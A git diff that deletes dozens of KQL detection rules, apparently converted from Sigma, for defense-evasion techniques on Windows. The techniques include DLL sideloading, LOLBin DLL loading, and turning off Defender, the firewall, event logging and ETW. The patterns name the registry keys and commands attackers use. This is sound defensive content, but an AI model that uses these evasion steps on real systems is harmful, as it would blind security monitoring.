-// Description: Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)
-// Tags: attack.defense_evasion, attack.t1574.002, attack.t1112
-DeviceRegistryEvents
-| where RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutDlls" or RegistryKey endswith "\\Services\\DHCPServer\\Parameters\\CalloutEnabled"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql b/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql
deleted file mode 100644
index 580b5c06..00000000
--- a/Defense Evasion/DLL_Execution_Via_Register-cimprovider.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ivan Dyachkov, Yulia Fomina, oscd.community
-// Date: 2020/10/07
-// Level: medium
-// Description: Detects using register-cimprovider.exe to execute arbitrary dll file.
-// Tags: attack.defense_evasion, attack.t1574
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-path" and ProcessCommandLine contains "dll") and FolderPath endswith "\\register-cimprovider.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql b/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql
deleted file mode 100644
index 2ffe336e..00000000
--- a/Defense Evasion/DLL_Execution_via_Rasautou.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/09
-// Level: medium
-// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql b/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql
deleted file mode 100644
index d3c89b0f..00000000
--- a/Defense Evasion/DLL_Load_By_System_Process_From_Suspicious_Locations.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/17
-// Level: medium
-// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public"
-// Tags: attack.defense_evasion, attack.t1070
-DeviceImageLoadEvents
-| where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql b/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql
deleted file mode 100644
index 021c10fe..00000000
--- a/Defense Evasion/DLL_Loaded_From_Suspicious_Location_Via_Cmspt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/30
-// Level: high
-// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
-// Tags: attack.defense_evasion, attack.t1218.003
-DeviceImageLoadEvents
-| where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql b/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql
deleted file mode 100644
index 7e67003a..00000000
--- a/Defense Evasion/DLL_Loaded_via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/10/23
-// Level: medium
-// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql b/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
deleted file mode 100644
index 056a9e92..00000000
--- a/Defense Evasion/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/07/30
-// Level: high
-// Description: Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
-but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.002
-DeviceFileEvents
-| where FolderPath endswith ".dll" and (FolderPath startswith "C:\\Windows \\" or FolderPath startswith "C:\\Program Files \\" or FolderPath startswith "C:\\Program Files (x86) \\")
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql b/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
deleted file mode 100644
index 29170ff9..00000000
--- a/Defense Evasion/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/01
-// Level: high
-// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL.
-Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
-
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ShellChromeAPI.dll"
\ No newline at end of file
diff --git a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql b/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql
deleted file mode 100644
index 3e19a55a..00000000
--- a/Defense Evasion/DLL_Sideloading_by_VMware_Xfer_Utility.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/02
-// Level: high
-// Description: Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
-// Tags: attack.defense_evasion, attack.t1574.002
-DeviceProcessEvents
-| where FolderPath endswith "\\VMwareXferlogs.exe" and (not(FolderPath startswith "C:\\Program Files\\VMware\\"))
\ No newline at end of file
diff --git a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql b/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql
deleted file mode 100644
index 35b252a0..00000000
--- a/Defense Evasion/DNS-over-HTTPS_Enabled_by_Registry.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Austin Songer
-// Date: 2021/07/22
-// Level: medium
-// Description: Detects when a user enables DNS-over-HTTPS.
-This can be used to hide internet activity or be used to hide the process of exfiltrating data.
-With this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.
-
-// Tags: attack.defense_evasion, attack.t1140, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "secure" and RegistryKey endswith "\\SOFTWARE\\Google\\Chrome\\DnsOverHttpsMode") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Edge\\BuiltInDnsClientEnabled") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Mozilla\\Firefox\\DNSOverHTTPS\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql b/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql
deleted file mode 100644
index 08a09450..00000000
--- a/Defense Evasion/Detect_Virtualbox_Driver_Installation_OR_Starting_Of_VMs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe
-// Date: 2020/09/26
-// Level: low
-// Description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
-// Tags: attack.defense_evasion, attack.t1564.006, attack.t1564
-DeviceProcessEvents
-| where (ProcessCommandLine contains "VBoxRT.dll,RTR3Init" or ProcessCommandLine contains "VBoxC.dll" or ProcessCommandLine contains "VBoxDrv.sys") or (ProcessCommandLine contains "startvm" or ProcessCommandLine contains "controlvm")
\ No newline at end of file
diff --git a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
deleted file mode 100644
index 42c5fde8..00000000
--- a/Defense Evasion/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/10
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/DeviceCredentialDeployment_Execution.kql b/Defense Evasion/DeviceCredentialDeployment_Execution.kql
deleted file mode 100644
index 9562d08b..00000000
--- a/Defense Evasion/DeviceCredentialDeployment_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\DeviceCredentialDeployment.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql b/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql
deleted file mode 100644
index 00125077..00000000
--- a/Defense Evasion/Devtoolslauncher.exe_Executes_Specified_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community (rule), @_felamos (idea)
-// Date: 2019/10/12
-// Level: high
-// Description: The Devtoolslauncher.exe executes other binary
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql b/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql
deleted file mode 100644
index cbf97ca4..00000000
--- a/Defense Evasion/Diagnostic_Library_Sdiageng.DLL_Loaded_By_Msdt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Greg (rule)
-// Date: 2022/06/17
-// Level: high
-// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library
-// Tags: attack.defense_evasion, attack.t1202, cve.2022.30190
-DeviceImageLoadEvents
-| where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Directory_Removal_Via_Rmdir.kql b/Defense Evasion/Directory_Removal_Via_Rmdir.kql
deleted file mode 100644
index 84822f3c..00000000
--- a/Defense Evasion/Directory_Removal_Via_Rmdir.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "rmdir" command in order to delete directories.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql b/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql
deleted file mode 100644
index 2dafc2c6..00000000
--- a/Defense Evasion/Disable_Administrative_Share_Creation_at_Startup.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: medium
-// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
-// Tags: attack.defense_evasion, attack.t1070.005
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\LanmanServer\\Parameters" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 2be410f2..00000000
--- a/Defense Evasion/Disable_Exploit_Guard_Network_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Exploit Guard Network Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql b/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql
deleted file mode 100644
index bcf1f3ec..00000000
--- a/Defense Evasion/Disable_Internal_Tools_or_Feature_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec
-// Date: 2022/03/18
-// Level: medium
-// Description: Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\shutdownwithoutlogon" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PushNotifications\\ToastEnabled" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\Storage\\Write Protection" or RegistryKey endswith "SYSTEM\\CurrentControlSet\\Control\\StorageDevicePolicies\\WriteProtect")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\StartMenuLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableChangePassword" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableLockWorkstation" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskmgr" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispBackgroundPage" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoDispCPL" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer\\DisableNotificationCenter" or RegistryKey endswith "SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql b/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql
deleted file mode 100644
index 98361323..00000000
--- a/Defense Evasion/Disable_Macro_Runtime_Scan_Scope.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/25
-// Level: high
-// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros
-// Tags: attack.defense_evasion
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\SOFTWARE" and RegistryKey contains "\\Microsoft\\Office" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql b/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql
deleted file mode 100644
index ae0316e9..00000000
--- a/Defense Evasion/Disable_Microsoft_Defender_Firewall_via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: medium
-// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Services\\SharedAccess\\Parameters\\FirewallPolicy" and RegistryKey endswith "\\EnableFirewall"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql
deleted file mode 100644
index 4c0fde0f..00000000
--- a/Defense Evasion/Disable_PUA_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: high
-// Description: Detects disabling Windows Defender PUA protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql b/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql
deleted file mode 100644
index 15e206f6..00000000
--- a/Defense Evasion/Disable_Privacy_Settings_Experience_in_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/10/02
-// Level: medium
-// Description: Detects registry modifications that disable Privacy Settings Experience
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql b/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql
deleted file mode 100644
index d1499c8c..00000000
--- a/Defense Evasion/Disable_Tamper_Protection_on_Windows_Defender.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer @austinsonger
-// Date: 2021/08/04
-// Level: medium
-// Description: Detects disabling Windows Defender Tamper Protection
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql b/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql
deleted file mode 100644
index 179a8de2..00000000
--- a/Defense Evasion/Disable_Windows_Defender_AV_Security_Monitoring.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: ok @securonix invrep-de, oscd.community, frack113
-// Date: 2020/10/12
-// Level: high
-// Description: Detects attackers attempting to disable Windows Defender using Powershell
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql b/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql
deleted file mode 100644
index ec388f50..00000000
--- a/Defense Evasion/Disable_Windows_Defender_Functionalities_Via_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel
-// Date: 2022/08/01
-// Level: high
-// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows Defender" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or RegistryKey contains "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\App and Browser protection\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\Real-Time Protection\\DisableBehaviorMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\Real-Time Protection\\DisableIOAVProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableOnAccessProtection" or RegistryKey endswith "\\Real-Time Protection\\DisableRealtimeMonitoring" or RegistryKey endswith "\\Real-Time Protection\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\Real-Time Protection\\DisableScriptScanning" or RegistryKey endswith "\\Reporting\\DisableEnhancedNotifications" or RegistryKey endswith "\\SpyNet\\DisableBlockAtFirstSeen")))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql b/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql
deleted file mode 100644
index d51c9399..00000000
--- a/Defense Evasion/Disable_Windows_Event_Logging_Via_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/04
-// Level: high
-// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error" or RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql b/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql
deleted file mode 100644
index 5a8e047e..00000000
--- a/Defense Evasion/Disable_Windows_Firewall_by_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set EnableFirewall to 0 to disable the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql b/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql
deleted file mode 100644
index 2e239422..00000000
--- a/Defense Evasion/Disable_Windows_IIS_HTTP_Logging.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/09
-// Level: high
-// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
-// Tags: attack.defense_evasion, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql b/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql
deleted file mode 100644
index 530809c4..00000000
--- a/Defense Evasion/Disable_Windows_Security_Center_Notifications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/19
-// Level: medium
-// Description: Detect set UseActionCenterExperience to 0 to disable the Windows security center notification
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "Windows\\CurrentVersion\\ImmersiveShell\\UseActionCenterExperience"
\ No newline at end of file
diff --git a/Defense Evasion/Disable_of_ETW_Trace.kql b/Defense Evasion/Disable_of_ETW_Trace.kql
deleted file mode 100644
index 9ce3bb23..00000000
--- a/Defense Evasion/Disable_of_ETW_Trace.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: @neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/03/22
-// Level: high
-// Description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562.006, car.2016-04-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "cl" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "clear-log" and ProcessCommandLine contains "/Trace") or (ProcessCommandLine contains "sl" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "set-log" and ProcessCommandLine contains "/e:false") or (ProcessCommandLine contains "logman" and ProcessCommandLine contains "update" and ProcessCommandLine contains "trace" and ProcessCommandLine contains "--p" and ProcessCommandLine contains "-ets") or ProcessCommandLine contains "Remove-EtwTraceProvider" or (ProcessCommandLine contains "Set-EtwTraceProvider" and ProcessCommandLine contains "0x11")
\ No newline at end of file
diff --git a/Defense Evasion/Disabled_IE_Security_Features.kql b/Defense Evasion/Disabled_IE_Security_Features.kql
deleted file mode 100644
index a947916f..00000000
--- a/Defense Evasion/Disabled_IE_Security_Features.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
